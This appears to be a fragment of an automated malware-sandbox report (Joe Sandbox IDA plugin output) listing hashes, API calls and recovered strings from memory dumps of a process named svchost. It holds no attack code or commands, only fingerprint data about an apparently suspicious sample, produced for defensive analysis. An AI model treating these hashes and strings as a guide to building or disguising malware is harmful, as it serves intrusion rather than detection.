            • Instruction Fuzzy Hash: C2D1A562E1CB8581EB03DB65D4413AD6761EBA6798F509331EA6C126E6EF78E1C0C740
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Xinvalid_argumentstd::_
            • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big$Precision not allowed for this argument type.
            • API String ID: 909987262-435359029
            • Opcode ID: 9b856d78c471b6c35b0c142e0dc81614399d0c1fa8a0b60b3d8d214c417cb35a
            • Instruction ID: acada3ea8bfc142ebcc3e817ef07b528bccbc89d4d8a0c61b9608f3f24b4724c
            • Opcode Fuzzy Hash: 9b856d78c471b6c35b0c142e0dc81614399d0c1fa8a0b60b3d8d214c417cb35a
            • Instruction Fuzzy Hash: 6641C822A0C64A86E717AB28D0502BD63B0FF52744F948532D75E425F6EF2DE592CB44
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Xinvalid_argumentstd::_
            • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big$Precision not allowed for this argument type.
            • API String ID: 909987262-435359029
            • Opcode ID: 939c25b8b0e087ed4ea9a280ac21a0873e20635cab4c111c9000ecd9a76c65dc
            • Instruction ID: d106cd97093c32db6f7f3c7f2beeb8146a0dce7adab95ea4178d0197644456ce
            • Opcode Fuzzy Hash: 939c25b8b0e087ed4ea9a280ac21a0873e20635cab4c111c9000ecd9a76c65dc
            • Instruction Fuzzy Hash: C841B022A0C98E86E727AB28C0552B923B0EB57750F54C932D36D425F7EF2DF592CA04
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: AddressHandleModuleProc
            • String ID: N/A$RtlGetVersion$Windows 10$Windows 11$Windows 7$Windows 8$Windows 8.1$ntdll.dll
            • API String ID: 1646373207-598478174
            • Opcode ID: 6c5f91436bfd3d17f716e9a4117406aca104a84b41777372b9a56a1694798d57
            • Instruction ID: a2d6234ce4ebb71d41d70cbf2c6976e5b3a0ca7c5d641a30708a23b9a3649bbb
            • Opcode Fuzzy Hash: 6c5f91436bfd3d17f716e9a4117406aca104a84b41777372b9a56a1694798d57
            • Instruction Fuzzy Hash: BB418131A1C74681FBA3AB11E8506B923F0EF46B84F50C132D94D466A6EF7CE6948F45
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+
            • String ID:
            • API String ID: 2943138195-0
            • Opcode ID: 7a6415545121bf96a2f2749d7b0ee29708ed43ddfd64904adf30b4ffbc6aacdf
            • Instruction ID: 18a6bd7e01bb04509e6ed2cfc10306e3f5dc92a99578c157987258e7fd83c283
            • Opcode Fuzzy Hash: 7a6415545121bf96a2f2749d7b0ee29708ed43ddfd64904adf30b4ffbc6aacdf
            • Instruction Fuzzy Hash: FA715272F08A4699EB13EF65C4901EC37B5EB4578CB408836DE0D57AAADF38E615C390
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$ApisFile__std_exception_copy__std_exception_destroy__std_fs_code_page
            • String ID: ", "$: "
            • API String ID: 4080386414-747220369
            • Opcode ID: efa70fbd6f32acbe59941765f86f7014a5e3dc94c7469349ed401cb701395e50
            • Instruction ID: 48355b30827b9952772555fab424d8ce591af39ee68ffca90fa9a3ec30f1b9e5
            • Opcode Fuzzy Hash: efa70fbd6f32acbe59941765f86f7014a5e3dc94c7469349ed401cb701395e50
            • Instruction Fuzzy Hash: 35E19272B08B8595EB06EF65D4843AC23B1EB46BC8F908131DB4D07BAAEF79D495C344
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Replicator::operator[]
            • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
            • API String ID: 3676697650-3207858774
            • Opcode ID: 3e1f19d6e438ab7e9379fa55d4a065f846d28f9fc50294b40c1f59c9183eaba8
            • Instruction ID: f49b362f2e79425c9ac8c24281b924a09cbf236c9b5e1890cbcec2fedea9f34a
            • Opcode Fuzzy Hash: 3e1f19d6e438ab7e9379fa55d4a065f846d28f9fc50294b40c1f59c9183eaba8
            • Instruction Fuzzy Hash: D1817926A0CA8699FB23AF21D4502B837A1EB5A74CF848532DA4D537B6DF3CF545C740
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
            • String ID: bad locale name$false$true
            • API String ID: 4121308752-1062449267
            • Opcode ID: d65148452f5e7adacad9643930f7b73dec780b70eb6e19a5f2d12b80b21efa29
            • Instruction ID: 464869080d234b46faf955baa95c583ec8818e85392f2143b80a0691241352e2
            • Opcode Fuzzy Hash: d65148452f5e7adacad9643930f7b73dec780b70eb6e19a5f2d12b80b21efa29
            • Instruction Fuzzy Hash: C1613D22B0D7418AFB17EFB0D4503BD27B5AF46748F548038DE4D27AA6EE38B4569344
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Xinvalid_argumentstd::_
            • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big$}
            • API String ID: 909987262-2617750137
            • Opcode ID: 9e820ddc437df5c9e36bb94561ecae091b3e11d17c2f936c628e370132d2eeea
            • Instruction ID: fe5a37989851cd3417bcb1b4ce908d6e2cb77d6e08425f29205f456816eda4bd
            • Opcode Fuzzy Hash: 9e820ddc437df5c9e36bb94561ecae091b3e11d17c2f936c628e370132d2eeea
            • Instruction Fuzzy Hash: 51519622A0C64A85DB27AB18E0501BD7370FF52B88F94D532D75D425F6EF2DE581CB48
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Xinvalid_argumentstd::_
            • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big$}
            • API String ID: 909987262-2617750137
            • Opcode ID: 8464d5bc04a8de789215cf5a13d7e47d57cd794df2a6ec7e3b7bdaa8b157e610
            • Instruction ID: 85010854f44cb5ca59646558586609c75193ba73409b68c3a4233123c50865d0
            • Opcode Fuzzy Hash: 8464d5bc04a8de789215cf5a13d7e47d57cd794df2a6ec7e3b7bdaa8b157e610
            • Instruction Fuzzy Hash: C351A422A0C58E85DB57AB28D0501B97370EF93745F548531D3AD431F7EF2DE686CA09
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+
            • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
            • API String ID: 2943138195-1464470183
            • Opcode ID: 5e1fe7b5236ca9fc109eba89ffb5c6bb728c9febe0ec77c823811000e643dc5a
            • Instruction ID: e505d09569443d19ca3959c26cd33024f54b043d910ae967bdc70ee40fb9734e
            • Opcode Fuzzy Hash: 5e1fe7b5236ca9fc109eba89ffb5c6bb728c9febe0ec77c823811000e643dc5a
            • Instruction Fuzzy Hash: 62513922E0CB16C9FB17EF65E8805AC37B1FB5638CF508435EA0D66AA5DF28E544C710
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: signal
            • String ID: CCG
            • API String ID: 1946981877-1584390748
            • Opcode ID: 01f8e4c4d1a19d00ad60ef520917e7cdb6b4237445d121632a71a9a355f36039
            • Instruction ID: d27226b85bcb93a9f3255e4fa10b6670b7ae65bfe50647b281e8467d6d08727b
            • Opcode Fuzzy Hash: 01f8e4c4d1a19d00ad60ef520917e7cdb6b4237445d121632a71a9a355f36039
            • Instruction Fuzzy Hash: 013154E1B0450E87FF6946BA44503392101AB8A33AFD58B27D97D873E5CF1DC8DD4A12
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+
            • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
            • API String ID: 2943138195-2239912363
            • Opcode ID: cdff2b580c51411059274661d36839feaa1db8aacfab0d2e903fa2f1fd28df11
            • Instruction ID: e7942764f7fe1ae00e0cfa265a5135d3d0271a538a91dcf4ad66705904000985
            • Opcode Fuzzy Hash: cdff2b580c51411059274661d36839feaa1db8aacfab0d2e903fa2f1fd28df11
            • Instruction Fuzzy Hash: 2F510862E1CB5698FB13AF60D8412BC37A0EB0675DF448636DE4D266A5DF3CB144C710
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: std::_$Lockit$Concurrency::cancel_current_taskLocinfo::_Locinfo_ctorLockit::_Lockit::~_
            • String ID: bad locale name$false$true
            • API String ID: 3230409043-1062449267
            • Opcode ID: 5fc55fd21848c481d300cee93076aa780238a10cd033d528215a27615c23e593
            • Instruction ID: e9033dde088524a46192d57f0cebe2f9b5d18e46fc417f4ea38bdba43f7a8127
            • Opcode Fuzzy Hash: 5fc55fd21848c481d300cee93076aa780238a10cd033d528215a27615c23e593
            • Instruction Fuzzy Hash: F7815E22B1DB8186EB12EF70D4802AD77B0FF85748F549135EA8D27A6ADF38E491C744
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: std::_$Lockit$GetcollLocinfo::_Locinfo_ctorLockit::_Lockit::~__invalid_parameter_noinfo_noreturn
            • String ID: \s+$bad locale name
            • API String ID: 3908275632-2606225191
            • Opcode ID: cf04b3abbb3fbb8494344bd742d89da18a9a5b969823627a3290b2fb8ec1eb62
            • Instruction ID: 31daf6c3f4f7bfa5c1e58d9883d99bafdf4374b2f79b608cadd05a450f08570b
            • Opcode Fuzzy Hash: cf04b3abbb3fbb8494344bd742d89da18a9a5b969823627a3290b2fb8ec1eb62
            • Instruction Fuzzy Hash: 1C514C22B09A418AFB13EFB0D4502AD3376EF46748F448135DF4D27BAADE38A5559388
            APIs
            • strlen.MSVCRT ref: 68290117
              • Part of subcall function 68294A10: ___lc_codepage_func.MSVCRT ref: 68294A42
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmp
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: ___lc_codepage_funcstrlen
            • String ID: %*.*S$%-*.*S$%.*S
            • API String ID: 962473550-2115465065
            • Opcode ID: 510814f8fe546983e93e9dcc38a1f95ea66455a78fca4571207376ec9573c394
            • Instruction ID: 0ab926ddb62d0b250be1d6b0493ac056b3dc13929d8b5f14602960803c593450
            • Opcode Fuzzy Hash: 510814f8fe546983e93e9dcc38a1f95ea66455a78fca4571207376ec9573c394
            • Instruction Fuzzy Hash: A531B17371464DC6DF558F2BE80476D77A1E781BA8F98C225DE688B748EB39C541CB00
            APIs
            • LoadLibraryExW.KERNEL32(?,00000000,?,00007FFA41860053,?,?,00000000,00007FFA41854B5E,?,?,?,00007FFA41854749), ref: 00007FFA4185FED1
            • GetLastError.KERNEL32(?,?,00000000,00007FFA41854B5E,?,?,?,00007FFA41854749), ref: 00007FFA4185FEDF
            • LoadLibraryExW.KERNEL32(?,?,00000000,00007FFA41854B5E,?,?,?,00007FFA41854749), ref: 00007FFA4185FF09
            • FreeLibrary.KERNEL32(?,?,00000000,00007FFA41854B5E,?,?,?,00007FFA41854749), ref: 00007FFA4185FF77
            • GetProcAddress.KERNEL32(?,?,00000000,00007FFA41854B5E,?,?,?,00007FFA41854749), ref: 00007FFA4185FF83
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Library$Load$AddressErrorFreeLastProc
            • String ID: ': $api-ms-
            • API String ID: 2559590344-2775044410
            • Opcode ID: 1cbb0e533028a347ded5b771b5de51c2b4e49b4d74a556ded3c8f6cb3392ee87
            • Instruction ID: 31a0cfa7e79fdaa4966964865ece07eb7552b2624dfff39c68635b6677182366
            • Opcode Fuzzy Hash: 1cbb0e533028a347ded5b771b5de51c2b4e49b4d74a556ded3c8f6cb3392ee87
            • Instruction Fuzzy Hash: 6E31B221B1EA4291EF17AF16A80053963A4FF47BA8F498535ED1D4BBA6EF3CF4458340
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: std::_$Lockit$Lockit::_Lockit::~_$_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFacet_RegisterSetgloballocale__std_exception_copystd::locale::_
            • String ID:
            • API String ID: 1589743132-0
            • Opcode ID: 4affefb6a32d44342c660ac3fca9004272aa80984d5d35650bf6e373c28eb61f
            • Instruction ID: 88d64fbf907590950f763d69cb6f648e70c622ed8d08994bb38a0d5c0da235cb
            • Opcode Fuzzy Hash: 4affefb6a32d44342c660ac3fca9004272aa80984d5d35650bf6e373c28eb61f
            • Instruction Fuzzy Hash: DFA1BE32B08B4186EB12EF61D8403AC33B1FB9A758F558235DA5D57BA6DF38E091C744
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo
            • String ID: f$p$p
            • API String ID: 3215553584-1995029353
            • Opcode ID: 4111e40542dbe3c1f3943ae55c068fff9b97fda351d2e0389a177bbe7fae8d17
            • Instruction ID: a059ad9a93dea5e0ae97f0fa9a8893d241e3cac1d6cc945b8a804ae177191c02
            • Opcode Fuzzy Hash: 4111e40542dbe3c1f3943ae55c068fff9b97fda351d2e0389a177bbe7fae8d17
            • Instruction Fuzzy Hash: DB128261E0C28385FB277B15E05877A7662EB82754FD4C136E69E466E4DF3CF8808B90
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmp
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo
            • String ID: f$p$p
